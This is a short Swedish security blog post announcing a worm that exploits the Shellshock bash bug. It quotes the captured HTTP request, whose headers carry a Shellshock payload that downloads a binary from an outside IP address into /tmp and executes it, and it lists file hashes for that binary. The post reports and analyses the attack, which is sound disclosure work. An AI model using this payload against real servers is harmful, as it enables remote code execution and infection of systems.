Shellshock nu som mask

För några minuter sedan observerades den första masken baserad på bash-buggen Shellshock. Detaljer från Github gist enligt följande:

GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*

$ file nginx 
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped

$ md5sum nginx 
5924bcc045bb7039f55c6ce29234e29a  nginx

$ sha256sum nginx 
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489  nginx

Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys
Jonas Lejon

Om Jonas Lejon

En av sveriges främsta experter inom cybersäkerhet. Kontakta mig gärna på telefonnummer 010 1889848 eller [email protected] om Er organisation behöver hjälp med cybersäkerhet. LinkedIn Twitter

Skriv en kommentar

Du kan använda följande HTML HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>